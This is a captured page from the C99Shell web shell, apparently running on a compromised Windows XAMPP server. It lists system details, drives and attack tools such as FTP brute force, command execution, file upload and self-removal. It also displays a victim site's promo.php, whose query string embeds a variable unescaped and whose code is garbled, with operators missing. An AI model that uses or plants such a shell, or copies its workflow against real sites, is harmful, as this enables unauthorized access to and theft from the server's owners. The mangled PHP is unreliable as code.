!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\portel_dama\libreria\php\Nueva carpeta\   drwxrwxrwx
Free 7.26 GB of 239.26 GB (3.04%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     promo.php (1.4 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
// Selector de cual banner
    
if (isset($var_2)) {
        
    }else{
        
$var_2 0;
    }
    
    
// Selector de si es horizontal o vertical
    
if (isset($var_1)) {
        
$parrafo "";
    }else{
        if (
$var_1 == 0) {
            
$parrafo "";
        }else{
            
$parrafo "<p>";    
        }
    }
    
//echo $var_2;
    
    
if (isset($d) and isset($m) and isset($y)) 
    {
        
$fecha $y "-" $m "-" $d " 00:00:00";    
    }else{    
        
$f = new fecha;
        
$f->sys_fecha();
        
$fecha $f->FECHA_SYS;
    }
    
    
$cuando "(( contenido_pertenencia_categoria_links.categoria_tema_id = '$patron' and contenido_pertenencia_categoria_links.links_id = contenido_links.links_id )
    and contenido_pertenencia_foto_links.links_id = contenido_links.links_id
    and contenido_pertenencia_foto_links.fotos_id = contenido_foto_y_medios.foto_id
    and ( contenido_links.links_tipo_id = 4 ) and ( contenido_links.links_estado = 0 )) 
    order by contenido_links.links_orden"
;
    
    
// 1. Opcion inicial de impresión con foto
    // Imprime la noticia con resize dinámico
    
    
$control = new select_pg(0"contenido_links.links_link, contenido_foto_y_medios.foto_archivo, contenido_links.links_nombre""contenido_links, contenido_pertenencia_categoria_links, contenido_foto_y_medios, contenido_pertenencia_foto_links"$cuando55"(link)-(archivo)-(nombre)""$parrafo<a href=\"(link)\"><img src=\"../(archivo)\" border=\"0\" alt=\"(nombre)\"></a> "$name_page ,$var_2); 
    
    
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.6396 ]--